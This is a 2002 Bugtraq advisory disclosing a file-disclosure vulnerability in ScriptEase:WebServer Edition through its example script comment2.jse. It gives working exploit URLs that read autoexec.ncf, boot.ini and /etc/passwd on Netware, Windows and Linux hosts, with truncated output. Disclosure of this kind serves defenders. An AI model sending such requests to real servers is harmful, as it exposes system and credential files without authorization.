ScriptEase:WebServer Edition vulnerability

From: Aleksander Posmyk (blah@omi.pl)
Date: 02/24/02


From: "Aleksander Posmyk" <blah@omi.pl>
To: <bugtraq@securityfocus.com>
Date: Sun, 24 Feb 2002 11:47:14 +0100

Program: ScriptEase:WebServer Edition
Url: www.nombas.com
Problem: Any user can read files on server using one of examle scripts: comment2.jse
Systems affected: Linux, Novell Netware, Windows 9x/NT/2k

Example:
WindowsNovell Netware:
http://novellhost/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
SET CLIENT FILE ...:
http://this.was.the.funniest/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
[boot loader] timeout=10 ...



Linux:
http://linuxhost/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
root:....

I found this in a default instalation of Novell Netware 5.1...
Sorry for my english.
________________________________
Aleksander Posmyk - blah@lucyfer.omi.pl




Relevant Pages

  • Novell Netware Login "bypass" to execute programs
    ... I don't have the resources to test this "bug" on other versions. ... This was on a windows 95 machine running novell netware client. ... When you boot the machine you get the novell netware login screen. ... Windows help opens. ...
    (Bugtraq)
  • =?iso-8859-1?q?Re:_Anmeldung_an_fremden_PCs_m=F6glich=3F?=
    ... bei Novell Netware generell nicht geht. ... Netzwerk entsprechend konfiguriert ist (auch ohne Zusatzprogramme wie ... werden hauptsächlich PCs mit Novell Netware in Verbindung mit Windows ... Der Zugriff auf Windows Server und auf Novell ...
    (de.comp.sys.novell)
  • Re: Migrating Directory and Data from Novell 6 to Windows 2008
    ... their data from novell netware 6.5 to windows 2008. ... Btw i've found some link in microsoft, ... migrating data from netware to windows 2003. ...
    (microsoft.public.windows.server.migration)
  • Re: IPX/SPX configures
    ... Malke wrote: ... >>between Windows XP and Windows 98SE over a WAN? ... > a Novell network? ... Novell Netware supports IP connections since Netware 4.0 ...
    (microsoft.public.windowsxp.general)